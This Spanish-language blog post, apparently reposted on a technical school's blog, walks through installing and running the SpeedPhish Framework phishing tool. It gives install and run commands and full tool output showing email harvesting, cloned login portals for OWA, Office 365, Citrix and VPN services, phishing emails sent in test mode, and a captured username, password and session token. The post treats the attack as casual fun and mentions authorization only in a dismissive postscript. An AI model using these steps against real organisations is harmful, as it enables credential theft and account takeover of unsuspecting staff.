Blog gratis
Reportar
Editar
¡Crea tu blog!
Compartir
¡Sorpréndeme!
Blog de la Escuela de Educación Secundaria Técnica N 8 de Quilmes
Administrador Prof. Claudio Enrique Alonso Alvite
img
16 de Julio, 2015    General

Realiza ataques de phishing en un santiamén con SPF (SpeedPhish Framework)

¿Estás en el chiringuito de playa y sientes la necesidad de juakear a algo o a alguien?, ¿qué tal un phishing rápido?. Déjame decirte primero que estás enfermo... y luego hablarte de SPF (SpeedPhish Framework), una herramienta escrita en python diseñada para realizar un rápido reconocimiento y desarrollo de phishings. Así que levanta la tapa de tu netbook y empieza a teclear...

Requisitos & instalación

apt-get update
apt-get upgrade -y
apt-get install build-essential python-dev python-pip phantomjs -y
pip install dnspython
pip install twisted
git clone https://github.com/tatanus/SPF.git

Ejecución

cd spf
python spf.py --all -d dominio.com (si has configurado previamente la pasarela SMTP y no quieres mandar los correos a las víctimas usa mejor --test)

[!] A CONFIG FILE was not specified...  defaulting to [default.cfg]

/home/vmotos/SPF/spf/dominio.com/
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
/home/vmotos/SPF/spf/dominio.com/spf.sqlite

[*] Obtaining list of email targets
[*] [VERBOSE] Gathering emails via built-in methods
[*] [VERBOSE] Currently searching [google, bing, ask, dogpile, yandex, baidu, yahoo, duckduckgo]
[*] [VERBOSE] [Processing: /] Google
[*] [VERBOSE] [Processing: -] Bing
[*] [VERBOSE] [Processing: /] Ask
[*] [VERBOSE] [Processing: /] Dogpile
[*] [VERBOSE] [Processing: -] Yandex
[*] [VERBOSE] [Processing: /] Baidu
[*] [VERBOSE] [Processing: /] Yahoo
[*] [VERBOSE] [Processing: |] DuckDuckGo
[*] [VERBOSE] Gathered [14] email addresses from the Internet

[*] [VERBOSE] Gathering emails via theHarvester
[!] ERROR: theHarvester_path does not point to a valid file

[*] [VERBOSE] Collected [14] unique email addresses
[*] ----------
[*] EMAIL LIST
[*] ----------
[*] pepito@dominio.com
[*] datacenter@dominio.com
[*] I@dominio.com
[*] pedro.sanchez@dominio.com
[*] javier.martin@dominio.com
[*] prodriguez@dominio.com
[*] compania@dominio.com
[*] datacenter@dominio.com
[*] dalvarez@dominio.com
[*] jgarcia@dominio.com
[*] informatica@dominio.com
[*] lmartinez@dominio.com
[*] n@dominio.com
[*] resecionsas@dominio.com

[*] Starting phishing webserver
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] FIXED = [templates/web/owa]
[*] [VERBOSE] FIXED = [templates/web/office365]
[*] [VERBOSE] FIXED = [templates/web/cisco]
[*] [VERBOSE] FIXED = [templates/web/citrix]
[*] [VERBOSE] FIXED = [templates/web/citrix2]
[*] [VERBOSE] FIXED = [templates/web/juniper_vpn]
[*] [VERBOSE] Found the following web sites: [templates/web/owa/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/office365/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/cisco/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix2/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/juniper_vpn/CONFIG]
[*] [VERBOSE] Started website [cisco_vpn ] on [http://169.168.1.200:8000]
[*] [VERBOSE] Started website [citrix2   ] on [http://169.168.1.200:8001]
[*] [VERBOSE] Started website [junipervpn] on [http://169.168.1.200:8002]
[*] [VERBOSE] Started website [owa       ] on [http://169.168.1.200:8003]
[*] [VERBOSE] Started website [office365 ] on [http://169.168.1.200:8004]
[*] [VERBOSE] Started website [citrix    ] on [http://169.168.1.200:8005]
[*] [VERBOSE] Created VHOST [cisco_vpn.dominio.com ] -> [http://169.168.1.200:8000]
[*] [VERBOSE] Created VHOST [citrix2.dominio.com   ] -> [http://169.168.1.200:8001]
[*] [VERBOSE] Created VHOST [junipervpn.dominio.com] -> [http://169.168.1.200:8002]
[*] [VERBOSE] Created VHOST [owa.example.com       ] -> [http://169.168.1.200:8003]
[*] [VERBOSE] Created VHOST [office365.example.com ] -> [http://169.168.1.200:8004]
[*] [VERBOSE] Created VHOST [citrix.dominio.com    ] -> [http://169.168.1.200:8005]
[*] [VERBOSE] Started WebServer with pid = [5077]

[*] [VERBOSE] Locating phishing email templates
[*] [DEBUG]   Found the following email template: [templates/email/citrix.txt]
[*] [DEBUG]   Found the following email template: [templates/email/office365.txt]
[*] [DEBUG]   Found the following email template: [templates/email/dynamic.txt]
[*] [DEBUG]   Found the following email template: [templates/email/citrix2.txt]
[*] [DEBUG]   Found the following email template: [templates/email/owa.txt]

[*] Sending phishing emails
[*] [VERBOSE] Sending Email to [pepito@dominio.com]
[*] Would have sent an email to [pepito@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [I@dominio.com]
[*] Would have sent an email to [I@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [pedro.sanchez@dominio.com]
[*] Would have sent an email to [pedro.sanchez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [javier.martin@dominio.com]
[*] Would have sent an email to [javier.martin@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [prodriguez@dominio.com]
[*] Would have sent an email to [prodriguez@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [compania@dominio.com]
[*] Would have sent an email to [compania@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [dalvarez@dominio.com]
[*] Would have sent an email to [dalvarez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [jgarcia@dominio.com]
[*] Would have sent an email to [jgarcia@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [informatica@dominio.com]
[*] Would have sent an email to [informatica@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [lmanzanares@dominio.com]
[*] Would have sent an email to [lmanzanares@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [n@dominio.com]
[*] Would have sent an email to [n@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [resecionsas@dominio.com]
[*] Would have sent an email to [resecionsas@dominio.com] with subject of [Updated Citrix Server], but this was just a test.

[*] Monitoring phishing website activity!


Ahora ábrete otra cervezita y a esperar...


[*] (Press CTRL-C to stop collection and generate report!)
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],192.168.2.7
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],192.168.2.7,password=['prueba123'], user=['pepito@dominio.com'], LoginType=['Explicit'], SESSION_TOKEN=['05F56F0AD6F7D8CD25E08F2BB935866E']


¡Bingo!

pd. Ni que decir tiene que el phishing ha de hacerse tras previa autorización del dueño o reponsable correspondiente del dominio y blah, blah,... ¡sed buenos!


Palabras claves , , ,
publicado por alonsoclaudio a las 20:38 · Sin comentarios  ·  Recomendar
 
Más sobre este tema ·  Participar
Comentarios (0) ·  Enviar comentario
Enviar comentario

Nombre:

E-Mail (no será publicado):

Sitio Web (opcional):

Recordar mis datos.
Escriba el código que visualiza en la imagen Escriba el código [Regenerar]:
Formato de texto permitido: <b>Negrita</b>, <i>Cursiva</i>, <u>Subrayado</u>,
<li>· Lista</li>
CALENDARIO
Ver mes anterior Marzo 2024 Ver mes siguiente
DOLUMAMIJUVISA
12
3456789
10111213141516
17181920212223
24252627282930
31
BUSCADOR
Blog   Web
TÓPICOS
» General (2606)
NUBE DE TAGS  [?]
SECCIONES
» Inicio
ENLACES
MÁS LEÍDOS
» Analizando el LiveBox 2.1 de Orange
» Cómo espiar WhatsApp
» Cómo usar Metashield protector for Client y por qué utilizarlo
» Detectando tráfico de conexiones HTTP inversas de Meterpreter (Snort)
» Ejecución remota de código arbitrario en OpenSSH
» Ganar dinero con 1.200 Millones de identidades robadas
» Hardware y sus 4 Funcionamientos Basicos y Principales en una Computadora
» Redes de la Deep Web: CJDNS y la Red Hyperboria
» Unidad Central de Procesamiento CPU
» Wassap, la aplicación que permite usar WhatsApp desde la PC
SE COMENTA...
» Cómo espiar WhatsApp
595 Comentarios: Scott, Scott, Jarlinson mercy, [...] ...
» Qué hacer ante el robo de un teléfono móvil o una tableta
2 Comentarios: best buy security cameras swann, best buy security cameras swann
» Espiando usuarios gracias a la vulnerabilidad en cámaras TRENDnet
1 Comentario: Coin
» Recopilatorio de aplicaciones y sistemas vulnerables para practicar
2 Comentarios: vera rodrigez ...
» SoftPerfect WiFi Guard permite saber quién esta conectado a mi WiFi
2 Comentarios: firdous ...
SOBRE MÍ
FOTO

Prof. Claudio Enrique Alonso Alvite



» Ver perfil

AL MARGEN
Escuela de Educacion Secundaria Tecnica N 8 de Quilmes
(Técnicos en Informática Personal y Profesional)
FULLServices Network | Blogger | Privacidad